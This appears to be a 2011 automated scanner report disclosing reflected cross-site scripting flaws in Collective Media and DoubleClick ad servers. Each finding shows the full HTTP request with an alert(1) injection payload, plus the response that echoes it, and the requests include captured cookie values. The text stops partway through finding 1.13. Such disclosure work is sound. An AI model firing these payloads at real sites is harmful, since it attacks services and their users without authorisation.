XSS, Cross Site Scripting, CWE-79, CAPEC-86, DORK, Report, Poc, March 20, 2011

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 56e3f<script>alert(1)</script>5c5002d7d1c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad56e3f<script>alert(1)</script>5c5002d7d1c/cm.mtv/games_010111 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc-dal-sea; dp2=1; JY57=35YvzfrqY8QJ9XL2-I1ND8AO_jR1EdT1Qzx7gTonjUIP66jUwQOVTIg; rdst12=1; cli=11e4f07c0988ac7; rdst11=1;

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Content-Type: text/html
Content-Length: 77
Vary: Accept-Encoding
Date: Sun, 20 Mar 2011 14:02:38 GMT
Connection: close

unknown path /ad56e3f<script>alert(1)</script>5c5002d7d1c/cm.mtv/games_010111

1.2. http://a.collective-media.net/adj/cm.mtv/games_010111 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/cm.mtv/games_010111

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 908c8'-alert(1)-'ae120f73045 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/cm.mtv908c8'-alert(1)-'ae120f73045/games_010111;sz=728x90;ord=[timestamp]? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://viacom.adbureau.net/hserver/height=90/width=728/site=SW.NOL/aamsz=728X90/NCP=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac7; rdst11=1; rdst12=1; dp2=1; JY57=35YvzfrqY8QJ9XL2-I1ND8AO_jR1EdT1Qzx7gTonjUIP66jUwQOVTIg; dc=dal-dc-sea

Response

1.3. http://a.collective-media.net/adj/cm.mtv/games_010111 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/cm.mtv/games_010111

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd281'-alert(1)-'4d4e405b1b6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/cm.mtv/games_010111cd281'-alert(1)-'4d4e405b1b6;sz=728x90;ord=[timestamp]? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://viacom.adbureau.net/hserver/height=90/width=728/site=SW.NOL/aamsz=728X90/NCP=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac7; rdst11=1; rdst12=1; dp2=1; JY57=35YvzfrqY8QJ9XL2-I1ND8AO_jR1EdT1Qzx7gTonjUIP66jUwQOVTIg; dc=dal-dc-sea

Response

1.4. http://a.collective-media.net/adj/cm.mtv/games_010111 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/cm.mtv/games_010111

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 20701'-alert(1)-'eb53c62230f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/cm.mtv/games_010111;sz=728x90;ord=[timestamp]?&20701'-alert(1)-'eb53c62230f=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://viacom.adbureau.net/hserver/height=90/width=728/site=SW.NOL/aamsz=728X90/NCP=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac7; rdst11=1; rdst12=1; dp2=1; JY57=35YvzfrqY8QJ9XL2-I1ND8AO_jR1EdT1Qzx7gTonjUIP66jUwQOVTIg; dc=dal-dc-sea

Response

1.5. http://a.collective-media.net/adj/cm.mtv/games_010111 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/cm.mtv/games_010111

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 29e47'-alert(1)-'6fcb0f358d1 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/cm.mtv/games_010111;sz=728x90;ord=[timestamp]?29e47'-alert(1)-'6fcb0f358d1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://viacom.adbureau.net/hserver/height=90/width=728/site=SW.NOL/aamsz=728X90/NCP=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac7; rdst11=1; rdst12=1; dp2=1; JY57=35YvzfrqY8QJ9XL2-I1ND8AO_jR1EdT1Qzx7gTonjUIP66jUwQOVTIg; dc=dal-dc-sea

Response

1.6. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.44 [adurl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N2524.134426.0710433834321/B4169763.44

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9b1cc"-alert(1)-"2276c812a67 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N2524.134426.0710433834321/B4169763.44;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=BiQfiHAGGTfi-G8_zlAf68cThD5Wpie8BrYeJ8hLjqLazM_CL0wQQARgBIM-2sAM4AGDJBqABo67u9gOyAQx3d3cud29vdC5jb226AQozMDB4MjUwX2FzyAEJ2gEjaHR0cDovL3d3dy53b290LmNvbS9XaGF0SXNXb290LmFzcHi4AhjAAgXIAuXvxRjgAgDqAhJ3b290LWJsb2cxLTMwMHgyNTCQA6QDmAOkA6gDAdEDX7TNu-ilXeToA-0C6AOTBOgDqQb1AwQEAMTgBAE&num=1&sig=AGiWqtwPCfylAn4LjFnmamHhqeEpZGvhnw&client=ca-pub-2332856072838068&adurl=9b1cc"-alert(1)-"2276c812a67 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7101
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 20 Mar 2011 13:46:11 GMT
Expires: Sun, 20 Mar 2011 13:46:11 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
XNXb290LmFzcHi4AhjAAgXIAuXvxRjgAgDqAhJ3b290LWJsb2cxLTMwMHgyNTCQA6QDmAOkA6gDAdEDX7TNu-ilXeToA-0C6AOTBOgDqQb1AwQEAMTgBAE&num=1&sig=AGiWqtwPCfylAn4LjFnmamHhqeEpZGvhnw&client=ca-pub-2332856072838068&adurl=9b1cc"-alert(1)-"2276c812a67http://ads.networksolutions.com/landing?code=P99C519S512N0B2A1D38E0000V109");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never
...[SNIP]...

1.7. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.44 [ai parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N2524.134426.0710433834321/B4169763.44

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4618b"-alert(1)-"b326dd202ce was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N2524.134426.0710433834321/B4169763.44;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=BiQfiHAGGTfi-G8_zlAf68cThD5Wpie8BrYeJ8hLjqLazM_CL0wQQARgBIM-2sAM4AGDJBqABo67u9gOyAQx3d3cud29vdC5jb226AQozMDB4MjUwX2FzyAEJ2gEjaHR0cDovL3d3dy53b290LmNvbS9XaGF0SXNXb290LmFzcHi4AhjAAgXIAuXvxRjgAgDqAhJ3b290LWJsb2cxLTMwMHgyNTCQA6QDmAOkA6gDAdEDX7TNu-ilXeToA-0C6AOTBOgDqQb1AwQEAMTgBAE4618b"-alert(1)-"b326dd202ce&num=1&sig=AGiWqtwPCfylAn4LjFnmamHhqeEpZGvhnw&client=ca-pub-2332856072838068&adurl=;ord=2113777662? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 20 Mar 2011 13:43:19 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 13:43:19 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7196

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
7u9gOyAQx3d3cud29vdC5jb226AQozMDB4MjUwX2FzyAEJ2gEjaHR0cDovL3d3dy53b290LmNvbS9XaGF0SXNXb290LmFzcHi4AhjAAgXIAuXvxRjgAgDqAhJ3b290LWJsb2cxLTMwMHgyNTCQA6QDmAOkA6gDAdEDX7TNu-ilXeToA-0C6AOTBOgDqQb1AwQEAMTgBAE4618b"-alert(1)-"b326dd202ce&num=1&sig=AGiWqtwPCfylAn4LjFnmamHhqeEpZGvhnw&client=ca-pub-2332856072838068&adurl=http%3a%2f%2fads.networksolutions.com/landing%3Fcode%3DP61C519S512N0B2A1D573E0000V102%26promo%3DHOSTING599");
var fsc
...[SNIP]...

1.8. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.44 [client parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N2524.134426.0710433834321/B4169763.44

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64db9"-alert(1)-"2b2d86eb64c was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N2524.134426.0710433834321/B4169763.44;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=BiQfiHAGGTfi-G8_zlAf68cThD5Wpie8BrYeJ8hLjqLazM_CL0wQQARgBIM-2sAM4AGDJBqABo67u9gOyAQx3d3cud29vdC5jb226AQozMDB4MjUwX2FzyAEJ2gEjaHR0cDovL3d3dy53b290LmNvbS9XaGF0SXNXb290LmFzcHi4AhjAAgXIAuXvxRjgAgDqAhJ3b290LWJsb2cxLTMwMHgyNTCQA6QDmAOkA6gDAdEDX7TNu-ilXeToA-0C6AOTBOgDqQb1AwQEAMTgBAE&num=1&sig=AGiWqtwPCfylAn4LjFnmamHhqeEpZGvhnw&client=64db9"-alert(1)-"2b2d86eb64c&adurl=;ord=2113777662? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 20 Mar 2011 13:45:33 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 13:45:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7073

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
0cDovL3d3dy53b290LmNvbS9XaGF0SXNXb290LmFzcHi4AhjAAgXIAuXvxRjgAgDqAhJ3b290LWJsb2cxLTMwMHgyNTCQA6QDmAOkA6gDAdEDX7TNu-ilXeToA-0C6AOTBOgDqQb1AwQEAMTgBAE&num=1&sig=AGiWqtwPCfylAn4LjFnmamHhqeEpZGvhnw&client=64db9"-alert(1)-"2b2d86eb64c&adurl=http%3a%2f%2fads.networksolutions.com/landing%3Fcode%3DP99C519S512N0B2A1D38E0000V109");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscri
...[SNIP]...

1.9. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.44 [num parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N2524.134426.0710433834321/B4169763.44

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98ce6"-alert(1)-"88b83c49634 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N2524.134426.0710433834321/B4169763.44;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=BiQfiHAGGTfi-G8_zlAf68cThD5Wpie8BrYeJ8hLjqLazM_CL0wQQARgBIM-2sAM4AGDJBqABo67u9gOyAQx3d3cud29vdC5jb226AQozMDB4MjUwX2FzyAEJ2gEjaHR0cDovL3d3dy53b290LmNvbS9XaGF0SXNXb290LmFzcHi4AhjAAgXIAuXvxRjgAgDqAhJ3b290LWJsb2cxLTMwMHgyNTCQA6QDmAOkA6gDAdEDX7TNu-ilXeToA-0C6AOTBOgDqQb1AwQEAMTgBAE&num=198ce6"-alert(1)-"88b83c49634&sig=AGiWqtwPCfylAn4LjFnmamHhqeEpZGvhnw&client=ca-pub-2332856072838068&adurl=;ord=2113777662? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 20 Mar 2011 13:43:56 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 13:43:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7244

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
AQx3d3cud29vdC5jb226AQozMDB4MjUwX2FzyAEJ2gEjaHR0cDovL3d3dy53b290LmNvbS9XaGF0SXNXb290LmFzcHi4AhjAAgXIAuXvxRjgAgDqAhJ3b290LWJsb2cxLTMwMHgyNTCQA6QDmAOkA6gDAdEDX7TNu-ilXeToA-0C6AOTBOgDqQb1AwQEAMTgBAE&num=198ce6"-alert(1)-"88b83c49634&sig=AGiWqtwPCfylAn4LjFnmamHhqeEpZGvhnw&client=ca-pub-2332856072838068&adurl=http%3a%2f%2fads.networksolutions.com/landing%3Fcode%3DP111C519S512N0B2A1D688E0000V101%26promo%3DBCXXX04226");
var fscUrl =
...[SNIP]...

1.10. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.44 [sig parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N2524.134426.0710433834321/B4169763.44

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f7e6"-alert(1)-"f66e95002d1 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N2524.134426.0710433834321/B4169763.44;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=BiQfiHAGGTfi-G8_zlAf68cThD5Wpie8BrYeJ8hLjqLazM_CL0wQQARgBIM-2sAM4AGDJBqABo67u9gOyAQx3d3cud29vdC5jb226AQozMDB4MjUwX2FzyAEJ2gEjaHR0cDovL3d3dy53b290LmNvbS9XaGF0SXNXb290LmFzcHi4AhjAAgXIAuXvxRjgAgDqAhJ3b290LWJsb2cxLTMwMHgyNTCQA6QDmAOkA6gDAdEDX7TNu-ilXeToA-0C6AOTBOgDqQb1AwQEAMTgBAE&num=1&sig=5f7e6"-alert(1)-"f66e95002d1&client=ca-pub-2332856072838068&adurl=;ord=2113777662? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 20 Mar 2011 13:44:48 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 13:44:48 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7099

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
3cud29vdC5jb226AQozMDB4MjUwX2FzyAEJ2gEjaHR0cDovL3d3dy53b290LmNvbS9XaGF0SXNXb290LmFzcHi4AhjAAgXIAuXvxRjgAgDqAhJ3b290LWJsb2cxLTMwMHgyNTCQA6QDmAOkA6gDAdEDX7TNu-ilXeToA-0C6AOTBOgDqQb1AwQEAMTgBAE&num=1&sig=5f7e6"-alert(1)-"f66e95002d1&client=ca-pub-2332856072838068&adurl=http%3a%2f%2fads.networksolutions.com/landing%3Fcode%3DP61C151S512N0B2A1D687E0000V102%26promo%3DBCXXX04225");
var fscUrl = url;
var fscUrlClickTagFound = false;
...[SNIP]...

1.11. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.44 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N2524.134426.0710433834321/B4169763.44

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ff7b"-alert(1)-"deb6fe20db3 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N2524.134426.0710433834321/B4169763.44;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=l2ff7b"-alert(1)-"deb6fe20db3&ai=BiQfiHAGGTfi-G8_zlAf68cThD5Wpie8BrYeJ8hLjqLazM_CL0wQQARgBIM-2sAM4AGDJBqABo67u9gOyAQx3d3cud29vdC5jb226AQozMDB4MjUwX2FzyAEJ2gEjaHR0cDovL3d3dy53b290LmNvbS9XaGF0SXNXb290LmFzcHi4AhjAAgXIAuXvxRjgAgDqAhJ3b290LWJsb2cxLTMwMHgyNTCQA6QDmAOkA6gDAdEDX7TNu-ilXeToA-0C6AOTBOgDqQb1AwQEAMTgBAE&num=1&sig=AGiWqtwPCfylAn4LjFnmamHhqeEpZGvhnw&client=ca-pub-2332856072838068&adurl=;ord=2113777662? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 20 Mar 2011 13:42:55 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 13:42:55 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7200

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
rl = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3ad0/f/1b1/%2a/r%3B233351444%3B0-0%3B0%3B50265526%3B4307-300/250%3B39688407/39706194/1%3B%3B%7Esscs%3D%3fhttp://adclick.g.doubleclick.net/aclk?sa=l2ff7b"-alert(1)-"deb6fe20db3&ai=BiQfiHAGGTfi-G8_zlAf68cThD5Wpie8BrYeJ8hLjqLazM_CL0wQQARgBIM-2sAM4AGDJBqABo67u9gOyAQx3d3cud29vdC5jb226AQozMDB4MjUwX2FzyAEJ2gEjaHR0cDovL3d3dy53b290LmNvbS9XaGF0SXNXb290LmFzcHi4AhjAAgXIAuXvxRjgAgDqAhJ3
...[SNIP]...

1.12. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [adurl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N2524.134426.0710433834321/B4169763.45

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd1c1"-alert(1)-"d7c78666f80 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BDKyNGgGGTeW2G87tlQeXo9nTCpWpie8BnfOH8hLjqLazM7DgpQMQARgBIM-2sAM4AFDEwrTWBmDJBqABo67u9gOyAQx3d3cud29vdC5jb226AQk3Mjh4OTBfYXPIAQnaARtodHRwOi8vd3d3Lndvb3QuY29tL0ZvcnVtcy-4AhjAAgXIAuXvxRioAwHRA1-0zbvopV3k6AOzAugD7QL1AwQFAMQ&num=1&sig=AGiWqtwnk5CjmbYfnLHaK27gT0fU3IqnSA&client=ca-pub-2332856072838068&adurl=dd1c1"-alert(1)-"d7c78666f80 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2332856072838068&format=728x90_as&output=html&h=90&w=728&lmt=1300645740&channel=Blog728Image&ad_type=text_image&color_bg=FFFFFF&color_border=FFFFFF&color_link=4A6751&color_text=000000&color_url=B35A1E&flash=10.2.154&url=http%3A%2F%2Fwww.woot.com%2FForums%2F&dt=1300627740399&bpp=3&shv=r20110315&jsv=r20110317&correlator=1300627740639&frm=0&adk=453380111&ga_vid=473007276.1300627741&ga_sid=1300627741&ga_hid=602886886&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=916&fu=0&ifi=1&dtd=506&xpc=A6InmP8TQy&p=http%3A//www.woot.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6985
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 20 Mar 2011 13:44:53 GMT
Expires: Sun, 20 Mar 2011 13:44:53 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
C5jb226AQk3Mjh4OTBfYXPIAQnaARtodHRwOi8vd3d3Lndvb3QuY29tL0ZvcnVtcy-4AhjAAgXIAuXvxRioAwHRA1-0zbvopV3k6AOzAugD7QL1AwQFAMQ&num=1&sig=AGiWqtwnk5CjmbYfnLHaK27gT0fU3IqnSA&client=ca-pub-2332856072838068&adurl=dd1c1"-alert(1)-"d7c78666f80http://ads.networksolutions.com/landing?code=P111C519S512N0B2A1D688E0000V100&promo=BCXXX04241");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowsc
...[SNIP]...

1.13. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [ai parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
